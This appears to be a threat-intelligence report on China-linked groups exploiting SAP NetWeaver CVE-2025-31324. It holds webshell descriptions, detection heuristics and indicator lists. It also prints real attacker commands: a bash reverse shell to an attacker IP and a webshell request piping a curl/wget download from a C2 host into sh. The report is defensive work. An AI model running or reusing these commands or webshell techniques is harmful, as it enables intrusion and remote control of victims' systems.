{ "id": "21ad36f8-97e3-4b96-b4e9-e7ec4ce12b37", "created_at": "2026-04-06T00:18:50.795208Z", "updated_at": "2026-04-10T03:36:00.748745Z", "deleted_at": null, "sha1_hash": "6b112602db1be562da8ee50864a9da8e25889403", "title": "China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2415661, "plain_text": "China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures\r\nArchived: 2026-04-05 12:42:53 UTC\r\nExecutive Summary\r\nEclecticIQ analysts assess with high confidence that, in April 2025, China-nexus nation-state APTs (advanced\r\npersistent threat) launched high-temp exploitation campaigns against critical infrastructure networks by targeting SAP\r\nNetWeaver Visual Composer. Actors leveraged CVE-2025-31324 [1], an unauthenticated file upload vulnerability that\r\nenables remote code execution (RCE). This assessment is based on a publicly exposed directory (opendir) found on\r\nattacker-controlled infrastructure, which contained detailed event logs capturing operations across multiple\r\ncompromised systems.\r\nEclecticIQ analysts link observed SAP NetWeaver intrusions to Chinese cyber-espionage units including UNC5221\r\n[2], UNC5174 [3], and CL-STA-0048 [4] based on threat actor tradecrafts patterns. Mandiant and Palo Alto researchers\r\nassess that these groups connect to China's Ministry of State Security (MSS) or affiliated private entities. These actors\r\noperate strategically to compromise critical infrastructures, exfiltrate sensitive data, and maintain persistent access\r\nacross high-value networks worldwide.\r\nUncategorized China-Nexus Threat Actor Scanning the Internet for CVE-2025-31324\r\nand Upload Webshells\r\nEclecticIQ analysts assess with high confidence that, a very likely China-nexus threat actor is conducting a widespread\r\ninternet scanning and exploitation campaign against SAP NetWeaver systems. Threat actor–controlled server hosted at\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 1 of 19\n\nIP address 15.204.56[.]106 exposed the scope of the SAP NetWeaver intrusions [5].\r\nFigure 2 - Attacker controlled C2\r\nServer with OpenDir.\r\nThreat actor hosted an openly accessible directory (opendir) on their server, which contained two result files generated\r\nusing Nuclei—a mass reconnaissance tool used to scan the internet for vulnerable SAP NetWeaver instances.\r\nThese files documented both the identification of exposed systems and successful exploitation attempts, offering\r\ninsight into the attacker's victimology:\r\nCVE-2025-31324-results.txt — documenting 581 SAP NetWeaver instances compromised and backdoored\r\nwith Webshell.\r\n服务数据_20250427_212229.txt — Simplified Chinese–named (“service data”) file listing 1,800 domains\r\nrunning SAP NetWeaver, suggesting targets for future exploitation.\r\nEclecticIQ analysts assess with high confidence that, the Chinese-language file names and attacker tradecraft across the\r\ncompromised infrastructure reinforce attribution to a Chinese-speaking operator.\r\nThe exposed open-dir infrastructure reveals confirmed breaches and highlights the group’s planned targets, offering\r\nclear insight into both past and future operations.\r\nEclecticIQ analysts confirmed the presence of two Webshells - deployed after post-exploitation to maintain persistence\r\nremote access into victim SAP systems:\r\n1. coreasp.js   coreasp.js [6]:\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 2 of 19\n\nFigure 3 - Coreasp Webshell source code.\r\nUses AES/ECB encryption to receive and return data in encrypted form evading network base detection.\r\nCapable of interactive remote command execution.\r\nUses a hardcoded key (693e1b581ad84b87) to decrypt payloads received via HTTP POST requests.\r\nDynamically defines and loads Java classes in memory using reflection, allowing fileless code execution.\r\nStores the in-memory class in an HTTP session attribute (ti) to persist the backdoor across requests.\r\nDoes not log to disk, reducing forensic footprint and making detection through file I/O nearly impossible.\r\nClosely resembles Behinder/冰蝎 v3 [7], a well-known post-exploitation toolkit used by Chinese-speaking\r\nthreat actors.\r\n2.Forwardsap.js   forwardsap.jsp [8]:\r\nFigure 4 - Forwardsap Webshell source code\r\nAccepts system commands via a query parameter named cmdhghgghhdd.\r\nExecutes remote commands using Runtime.getRuntime().exec() and returns output to the browser.\r\nOutputs command results in \u003cpre\u003e format, making it easy to view responses in the web UI.\r\nSmall and lightweight (≈20 lines of code), making it ideal for quick access or troubleshooting.\r\nLikely used as a fallback shell if the encrypted channel fails or is blocked.\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 3 of 19\n\nExposes system-level functionality with no authentication or obfuscation, posing immediate risk if discovered.\r\nEclecticIQ analysts observed these Webshells in exploited systems that were uploaded to SAP NetWeaver systems after\r\na POST request to the API endpoint:\r\n       /developmentserver/metadatauploader\r\nVictimology Pattern Reveals Strategic Focus on Essential Services and Government\r\nEntities\r\nAnalysis of the open-dir infrastructure reveals a targeted campaign against critical sectors across multiple countries.\r\nThe threat actor's victim selection is a strategic focus on essential services and government entities, as detailed below:\r\nUnited Kingdom\r\nCritical natural gas distribution networks\r\nWater \u0026 integrated waste management utilities\r\nUnited States\r\nAdvanced medical device manufacturing plants\r\nUpstream oil and gas exploration and production companies\r\nSaudi Arabia\r\nGovernment ministries responsible for investment strategy and financial regulation\r\nWhile many of the compromised entities are in the private sector, their functions such as delivering water to\r\nhouseholds, distributing energy, or producing advanced medical technologies are essential to public welfare and\r\nnational resilience.\r\nPersistence backdoor access to these systems provides a foothold for China-aligned APTs, potentially enabling\r\nstrategic objectives of the People’s Republic of China (PRC), including military, intelligence, or economic advantage.\r\nThe compromised SAP systems are also highly connected to internal network of the industrial control system (ICS)\r\nwhich is poses lateral movement risks, that potentially cause service disruption to long-term espionage.\r\nCL-STA-0048 Activity: Interactive Reverse Shell and DNS Beaconing on SAP\r\nEnvironments\r\nOn April 28, 2025, EclecticIQ analysts observed command-and-control (C2) traffic originating from compromised SAP\r\nNetWeaver systems. The traffic was directed to IP address 43.247.135[.]53, which resolved to CL-STA-0048 threat\r\nactor linked domain name sentinelones[.]com [9], indicating an active communication channel between breached\r\nenterprise infrastructure and the attacker's C2 infrastructure [10].\r\nCL-STA-0048, a Chinese state-backed APT tracked by Unit 42, has a consistent track record of targeting strategic\r\nsectors across South Asia. EclecticIQ analysts assess with high confidence that this group is likely behind observed\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 4 of 19\n\nSAP NetWeaver intrusions. This assessment is based on overlaps in in post-exploitation tactics, such as using the ping\r\ncommand for DNS beaconing and shared infrastructure.\r\nFigure 5 - Link analysis with report from Palo Alto Unit42 researchers.\r\nAnalysts observed multiple reverse shell attempts over TCP port 10443 directed at 43.247.135[.]53, including payloads\r\nsuch as:\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 5 of 19\n\nFigure 6 - Network Event logs showing command execution.\r\n/bin/bash -i \u003e\u0026 /dev/tcp/43.247.135[.]53/10443 0\u003e\u00261\r\ncurl http://43.247.135[.]53:10443\r\nThreat actors use these malicious commands to establish interactive C2 sessions with direct reverse shell access.\r\nEclecticIQ analysts assess with medium confidence that China-nexus group CL-STA-0048, is also likely linked to\r\nactivities observed by Fortinet on October 11, 2024 [11].\r\nAccording to network event logs (Figure 6), EclecticIQ analysts assess with medium confidence that threat actor CL-STA-0048 likely initiated DNS-based beaconing at 08:50:34 AM. The actor sent a ping command to a subdomain of\r\n*.oastify.com, just 94 seconds after executing a reverse shell bash command via HTTP to C2 IP address\r\n43.247.135[.]53 at 08:49:00 AM.\r\nObserved Command:\r\nping -c 1 aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com\r\nThis command triggered DNS A record resolution—likely a tactic to verify successful exploitation.\r\nResolved IPs via DNS:\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 6 of 19\n\nFigure 7 - Resolved IP address in DNS A record.\r\n54.77.139[.]23 (oastify[.].com subdomains)\r\n3.248.33[.]252 (Threat actor IP interacting with Webshell – per Fortinet)\r\nThe observed IP addresses in SAP NetWeaver intrusions are also linked to Fortinet’s report, which identifies both IPs\r\nas part of the infrastructure used in exploiting Ivanti CSA vulnerabilities (CVE-2024-8963 \u0026 CVE-2024-9380) [12].\r\nEnumeration Techniques Observed in SAP NetWeaver Intrusions\r\nFollowing initial compromise via CVE-2025-31324, the Chinese-nexus threat actors conducted reconnaissance on\r\ninfected SAP NetWeaver hosts by executing remote Linux commands using Webshells.\r\nAnalysis of nearly 5,000 malicous commands executed across multiple victims clearly indicates that the threat actor\r\nperformed network-level discovery and mapped SAP-specific applications. The actor's goal was to identify backup\r\ndetails and use these metedata for lateral movement.\r\nIn most of the incidents, threat actors performed network discovery using commands like arp -a and by parsing\r\n/etc/hosts. Their goal was to identify nearby systems that could serve as pivots for lateral movement, including targets\r\nwithin cloud-connected infrastructure like AWS workloads and Entra ID (formerly Azure AD) identities.\r\nThe following table summarizes observed enumeration goals, techniques, and tools:\r\nFigure 8 – Enumeration commands executed in victim system.\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 7 of 19\n\nAccording to results from attacker infrastructure, many compromised systems were running on VMware ESXi\r\nhypervisors. These systems were directly connected to the internal network of the business without any segmentation\r\nor firewall, further increasing the risk of potential lateral movement attacks that could increase the impact of the SAP\r\nNetWeaver intrusions.\r\nKrustyLoader Delivered via Threat Actor-Controlled AWS S3 Buckets\r\nEclecticIQ analysts identified a intrusion pattern involving the deployment of KrustyLoader [13]. China-nexus APT\r\nleveraged a Webshell at /irj/helper.jsp to execute arbitrary remote commands and initiate the malware delivery process\r\nin compromised SAP NetWeaver systems.\r\nFigure 9 – EclecticIQ TIP graph analysis showing links to different intrusions and their links into threat actors.\r\nThe attackers leveraged Linux Bash one-liners to retrieve and decode a base64-encoded KrustyLoader payload hosted\r\non attacker-controlled Amazon S3 buckets. Using built-in system utilities such as curl and wget, they downloaded the\r\nKrustyLoader, enabling its execution while evading traditional security filters by abusing trusted AWS infrastructure.\r\nIdentified Amazon S3 Domains Hosting KrustyLoader:\r\napplr-malbbal.s3.ap-northeast-2.amazonaws[.]com\r\nabode-dashboard-media.s3.ap-south-1.amazonaws[.]com (Also observed by Volexity in January 18,2024 [14])\r\nbrandnav-cms-storage.s3.amazonaws[.]com\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 8 of 19\n\nFigure 10 – Downloading malicious payload from remote host.\r\nNetwork telemetry logs in Figure 10, confirmed repeated outbound connections to these domains, confirming the role\r\nof Amazon S3 in the malware delivery chain. Threat actors abused the legitimate AWS cloud service to mask its\r\nmalicious activity and evade detection.\r\nKrustyLoader is a Rust-based malware loader designed to deliver Sliver backdoors in post-exploitation scenarios [15].\r\nIndustry researchers initially identified KrustyLoader following the exploitation of Ivanti ConnectSecure VPN zero-days (CVE-2024-21887 and CVE-2023-46805). These intrusions were attributed to threat actor clusters (per Volexity)\r\n[16] and UNC5221 (per Mandiant) [17]. Available evidence does not conclusively attribute KrustyLoader itself to\r\nUNC5221.\r\nKrustyLoader’s purpose is to evade detection while reliably maintaining persistence across compromised Linux\r\nsystems. Once deployed, KrustyLoader executes a series of anti-analysis and environmental checks before proceeding:\r\nReads and deletes its own binary to reduce forensic visibility.\r\nVerifies it is executing from the /tmp/ directory and aborts otherwise.\r\nPerforms anti-debugging checks, including scanning for debugger strings (e.g., gdb, lldb) in /proc/self/exe.\r\nExits early if the process parent ID equals 1 or if specific temporary files are missing.\r\nIf these conditions are met, the loader decrypts a hardcoded staging URL using a three-step obfuscation chain—hex\r\ndecoding, XOR transformation, and AES-128-CFB decryption. It then retrieves an encrypted payload, writes it to a file\r\nin /tmp/, marks it executable, and launches it.\r\nKrustyLoader serves four strategic functions in an attacker’s arsenal:\r\nDelivering second-stage payloads like Sliver\r\nEstablishing persistence by evading common analysis and sandbox triggers\r\nExecuting arbitrary shell commands in a post-exploitation environment\r\nMaintaining C2 communication via attacker-controlled infrastructure\r\nIts use of the Rust programming language introduces inherent obfuscation due to static linking, stripped symbols, and\r\ncomplex control flows—complicating reverse engineering efforts.\r\nUNC5174  Activity: Deploying SNOWLIGHT Downloader to Execute VShell Remote\r\nAccess Trojan (RAT)\r\nEclecticIQ analysts assess with high confidence that the threat actor UNC5174 is very likely actively exploiting\r\nvulnerable SAP NetWeaver systems to deploy a multi-stage malware chain involving the SNOWLIGHT downloader\r\n[18], a GO based Remote Access Trojan (RAT) malware called VShell [19] and GOREVERSE [20] a backdoor\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 9 of 19\n\noperates over Secure Shell (SSH). Google threat researchers linked UNC5174 to the Chinese threat nexus, identifying\r\nit as an initial access broker and likely associated with the Ministry of State Security (MSS).\r\nEclecticIQ observed that on Apr 28, 2025, UNC5174 very likely deployed a Webshell in SAP NetWeaver to execute a\r\nBash command via the endpoint helper.jsp.\r\nFigure 11 - Downloading malicious bash script from remote host.\r\n           GET /irj/helper.jsp?cmd=(curl -fsSL -m180 http://103.30.76.206:443/slt || wget -T180 -q\r\nhttp://103.30.76.206:443/slt)|sh\r\nThe Bash script downloads and executes another shell script named SLT.sh. This script identifies the system\r\narchitecture of the compromised host and downloads the appropriate SNOWLIGHT binary using available tools such\r\nas curl, wget, or python.\r\nFigure 12 - Bash script code in STL.sh.\r\nThe script is designed for adaptability to victim operating system, by executing payloads from multiple directories and\r\nmanipulating the system PATH to prioritize malicious binaries—tactics consistent with post-exploitation staging seen\r\nin prior UNC5174 campaigns.\r\nBased on the behaviour of SLT.sh and subsequent execution of SNOWLIGHT, EclecticIQ assesses that UNC5174 is\r\nseeking to establish architecture aware, persistent access through in-memory malware. This is in line with the group’s\r\nhistorically stealth-oriented operational profile.\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 10 of 19\n\nSNOWLIGHT Execution and VShell RAT Deployment\r\nThe SNOWLIGHT binary acts as a loader that initiates a connection with a hardcoded command-and-control (C2)\r\nserver at 103.30.76[.]206 over TCP port 443.\r\nFigure 13 – Disassembled SNOWLIGHT sample showing static C2 IP address.\r\nOnce connected, SNOWLIGHT performs a simple handshake (including sending a tag like \"l64\" and host metadata),\r\nthen receives a second-stage payload that is XOR-encoded using the key 0x99. This payload is decrypted in memory,\r\nthen executed using the memfd_create system call (syscall 319) and fexecve, allowing for complete in-memory\r\nexecution without touching disk.\r\nFigure 14 - XOR decryption routine that use 0x99 as a key.\r\nEclecticIQ analysts identified the second-stage implant as an in-memory variant of VShell, an open-source RAT used\r\nfor persistent remote control.\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 11 of 19\n\nFigure 15 - Example of a Vshell C2 Server published in Chinese forums.\r\nVShell is executed under a process name like [kworker/0:2] to masquerade as a benign kernel thread—an obfuscation\r\ntechnique frequently used in UNC5174 operations to avoid detection in process listings.\r\nFigure 16 - Static process name kworker/0:2 inside the SNOWLIGHT sample.\r\nHistorical Context and Attribution Confidence for UNC5174\r\nEclecticIQ’s assessment aligns with earlier findings from Google Mandiant and Sysdig, which have attributed similar\r\nTTPs to UNC5174. Mandiant previously linked UNC5174 to the exploitation of F5 BIG-IP (CVE-2023-46747) and\r\nConnectWise ScreenConnect (CVE-2024-1709). Both of these vulnerabilities were used to deploy the SNOWLIGHT\r\ndownloader.\r\nThese campaigns demonstrated UNC5174’s ability to leverage public vulnerabilities in their tradecraft and to maintain\r\na modular infection chain catered around SNOWLIGHT downloader.\r\nSysdig’s research further confirmed the use of VShell by UNC5174 in cloud-native and containerized environments,\r\nwhere the group used in-memory implants and runtime evasion tactics. The reuse of SNOWLIGHT and VShell in the\r\nSAP NetWeaver intrusions observed by EclecticIQ analysts provides strong supporting evidence of actor continuity\r\nand their target scope toward enterprise infrastructure.\r\nGiven the consistent infrastructure, malware reuse, and tactical overlap, EclecticIQ assesses with high confidence that\r\nthis activity is very likely attributable to UNC5174 and represents an ongoing campaign to exploit high-value\r\nenterprise systems.\r\nChina-Aligned APT Focus on Public-Facing Enterprise Applications for Long-Term\r\nStrategic Access\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 12 of 19\n\nEclecticIQ analysts assess with high confidence that China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistence access to critical\r\ninfrastructure networks globally.\r\nTheir focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated\r\ninto enterprise environments and often host unpatched vulnerabilities.\r\nCompromising such applications, China-nexus APTs can gain high-privilege access to internal networks, including\r\ncloud services, VMware ESXi virtual machines, and operationally critical IoT/OT devices.\r\nThis enables cyber espionage, sustained surveillance, and potential disruption during geopolitical crises involving\r\nChina. The exposure of these essential systems transforms technical vulnerabilities into serious national and economic\r\nsecurity threats, given their foundational role in government and business operations.\r\nPrevention Strategies\r\n·         Apply SAP Security Note #3594142 immediately on all affected systems (SAP NetWeaver 7.1x with\r\nVCFRAMEWORK).\r\n·         If patching is not possible, implement the recommended workaround from SAP Note #3593336:\r\no   Complete removal of sap.com/devserver_metadataupload_ear.\r\n·         Restrict access to /developmentserver/metadatauploader to internal, authenticated IP ranges.\r\n·         Block unauthenticated or public network access via WAF/firewall rules.\r\nDetection and Threat Hunting Strategies\r\nFile-system IOC sweep (Linux \u0026 Windows SAP hosts)\r\nInspect for unauthorised web-executable files in the Visual Composer paths:\r\n…/irj/servlet_jsp/irj/work \r\n…/irj/servlet_jsp/irj/work/sync\r\n…/irj/servlet_jsp/irj/root\r\nAutomate with:\r\nfind . -type f \\( -name \"*.jsp\" -o -name \"*.java\" -o -name \"*.class\" \\) -ls\r\nFlag any of the following:\r\nKnown webshells (helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp,\r\n.h.jsp)\r\nRandomised names:\r\n8-character pattern [a-z]{8}.jsp\r\nVariable-length alphanumerics ≤ 10 chars\r\nWeb-access log analytics\r\nTrace hits on /irj/*.jsp?cmd= to surface webshell command execution.\r\nProcess \u0026 command-line heuristics (EDR/Sysmon)\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 13 of 19\n\nbash or sh processes containing Base64 decode plus curl/wget:\r\nprocess == \"bash\" \u0026\u0026 command_includes(\"base64, -d\").\r\ncurl or wget writing to /tmp (or %TEMP% on Windows) then chmod/execute.\r\nPython one-liners opening sockets or duplicating FDs:\r\nprocess == \"python*\" \u0026\u0026 command_includes(\"socket\") \u0026\u0026 command_includes(\"dup2\").\r\nNetwork \u0026 proxy monitoring\r\nQuery NetWeaver System Info for VCFRAMEWORK; flag any instance where version is \u003c patched build in\r\nSAP Note 3594142.\r\nHunt for successful logins that occur immediately after webshell activity or from atypical source IPs.\r\nMITRE ATT\u0026CK Matrix\r\nIndicator of Compromise (IOC)\r\nUncategorized China‑Nexus actor (internet‑wide CVE‑2025‑31324 scanning):\r\n·         15.204.56[.]106 (opendir server hosting logs, web‑shells, target lists)\r\no   4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d\r\no   63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd\r\n CL‑STA‑0048 (reverse‑shell \u0026 DNS‑beaconing)\r\n·         43.247.135[.]53  (resolves to sentinelones.com, TCP 10443)\r\n·         aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com\r\n54.77.139[.]23\r\n3.248.33[.]252\r\nKrustyLoader ➞ Sliver chain\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 14 of 19\n\n·         applr-malbbal.s3.ap-northeast-2.amazonaws[.]com\r\no   f92d0cf4d577c68aa615797d1704f40b14810d98b48834b241dd5c9963e113ec\r\n·         abode-dashboard-media.s3.ap-south-1.amazonaws[.]com  (also seen in earlier 2024 ops)\r\no   47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04\r\no   3f14dc65cc9e35989857dc1ec4bb1179ab05457f2238e917b698edb4c57ae7ce\r\no   91f66ba1ad49d3062afdcc80e54da0807207d80a1b539edcdbd6e1bf99e7a2ca\r\n·         brandnav-cms-storage.s3.amazonaws[.]com\r\no   c71da1dfea145798f881afd73b597336d87f18f8fd8f9a7f524c6749a5c664e4\r\no   b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4fbbdd7668492de548b5df8\r\no   0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579\r\no   5f3d1f17033d85b85f3bd5ae55cb720e53b31f1679d52986c8d635fd1ce0c08a\r\nUNC5174 (SNOWLIGHT ➞ VShell chain \u0026 GOREVERSE)\r\n·         103.30.76[.]206  (TCP 443 used by SNOWLIGHT handshake)\r\no   2dcbb4138f836bb5d7bc7d8101d3004848c541df6af997246d4b2a252f29d51a\r\no   00920e109f16fe61092e70fca68a5219ade6d42b427e895202f628b467a3d22e\r\no   b9533ce8e428f16f3d0e1946f19a6f756ff11a532d0b7e61ae402837f46c678e\r\n·         ocr-freespace.oss-cn-beijing.aliyuncs.com/2025/config.sh (GOREVERSE)\r\no   888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef\r\no   5e24b41a0bd076ec2b4e49e66daac94396c6180d00a45bcd7f4342a385fa1eed\r\nIP Address Observed in SAP NetWeaver Intrusion Victims:\r\n45[.]155[.]222[.]14\r\n15[.]204[.]56[.]106\r\n159[.]65[.]34[.]242\r\n138[.]68[.]61[.]82\r\n192[.]243[.]115[.]175\r\n107[.]175[.]77[.]118\r\n15[.]188[.]246[.]198\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 15 of 19\n\n138[.]197[.]40[.]133\r\n43[.]247[.]135[.]53\r\n23[.]95[.]123[.]5\r\n215[.]204[.]56[.]106\r\n27[.]25[.]148[.]183\r\n65[.]20[.]81[.]172\r\n3[.]125[.]102[.]39\r\n212[.]11[.]64[.]225\r\n130[.]185[.]118[.]247\r\n212[.]192[.]15[.]213\r\n52[.]172[.]31[.]130\r\n149[.]62[.]46[.]132\r\n196[.]251[.]85[.]31\r\n162[.]248[.]53[.]119\r\n103[.]30[.]76[.]206\r\n206[.]237[.]1[.]201\r\n141[.]164[.]35[.]53\r\n107[.]174[.]81[.]24\r\n208[.]76[.]55[.]39\r\n52[.]185[.]157[.]28\r\n65[.]49[.]235[.]210\r\n185[.]143[.]222[.]215\r\n185[.]165[.]169[.]31\r\n46[.]29[.]161[.]198\r\n62[.]234[.]24[.]38\r\n64[.]233[.]180[.]99\r\n45[.]77[.]119[.]13\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 16 of 19\n\n23[.]227[.]196[.]204\r\n184[.]174[.]96[.]39\r\n96[.]9[.]124[.]89\r\n156[.]238[.]224[.]227\r\n153[.]92[.]4[.]236\r\n45[.]61[.]137[.]162\r\n64[.]95[.]11[.]95\r\n142[.]202[.]4[.]28\r\n154[.]37[.]221[.]237\r\nReferences\r\n[1] “Active Exploitation of SAP NetWeaver Visual Composer CVE-2025-31324 | Rapid7 Blog,” Rapid7. Accessed:\r\nMay 06, 2025. [Online]. Available: https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324/\r\n[2] “UTA0178 (Threat Actor).” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/uta0178\r\n[3] “UNC5174 (Threat Actor).” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/unc5174\r\n[4] “CL-STA-0048 Archives,” Unit 42. Accessed: May 06, 2025. [Online]. Available:\r\nhttps://unit42.paloaltonetworks.com/tag/cl-sta-0048/\r\n[5] “FOFA Search Engine,” FOFA. Accessed: May 06, 2025. [Online]. Available: https://fofa.info\r\n[6] “VirusTotal - File - 4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d.” Accessed: May\r\n06, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d\r\n[7] rebeyond, rebeyond/Behinder. (May 06, 2025). Accessed: May 06, 2025. [Online]. Available:\r\nhttps://github.com/rebeyond/Behinder\r\n[8] “VirusTotal - File - 63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd.” Accessed: May\r\n06, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/file/63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd/detection\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 17 of 19\n\n[9] “VirusTotal - Domain - sentinelones.com.” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://www.virustotal.com/gui/domain/sentinelones.com/relations\r\n[10] L. R. Zemah Yoav, “CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia,” Unit 42.\r\nAccessed: May 06, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/\r\n[11] F. A. M. Q. Reyes John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, Robert, “Burning Zero\r\nDays: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs,” Fortinet Blog. Accessed: May 06,\r\n2025. [Online]. Available: https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa\r\n[12] “Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-\r\n9381).” Accessed: May 06, 2025. [Online]. Available: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US\r\n[13] “KrustyLoader (Malware Family).” Accessed: May 06, 2025. [Online]. Available:\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.krustyloader\r\n[14] Volexity, “Ivanti Connect Secure VPN Exploitation: New Observations,” Volexity. Accessed: May 06, 2025.\r\n[Online]. Available: https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/\r\n[15] “KrustyLoader - Rust malware linked to Ivanti ConnectSecure compromises,” Synacktiv. Accessed: May 06,\r\n2025. [Online]. Available: https://www.synacktiv.com/publications/krustyloader-rust-malware-linked-to-ivanti-connectsecure-compromises\r\n[16] S. Adair, “Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN,” Volexity.\r\nAccessed: May 06, 2025. [Online]. Available: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/\r\n[17] “Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation,” Google\r\nCloud Blog. Accessed: May 06, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/suspected-apt-targets-ivanti-zero-day\r\n[18] “Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect,”\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 18 of 19\n\nGoogle Cloud Blog. Accessed: May 06, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect\r\n[19] A. Rizzo, “UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell,” Sysdig.\r\nAccessed: May 06, 2025. [Online]. Available: https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\r\n[20] C. L. Li Vincent, “Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs,” Fortinet\r\nBlog. Accessed: May 06, 2025. [Online]. Available: https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401\r\nSource: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nhttps://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\r\nPage 19 of 19\n\nEclecticIQ vulnerable analysts SAP NetWeaver assess with high confidence systems to that the deploy a multi-stage threat actor UNC5174 malware chain is very likely involving the SNOWLIGHT actively exploiting downloader\n[18], a GO based Remote Access Trojan (RAT) malware called VShell [19] and GOREVERSE [20] a backdoor\n Page 9 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures" ], "report_names": [ "china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures" ], "threat_actors": [ { "id": 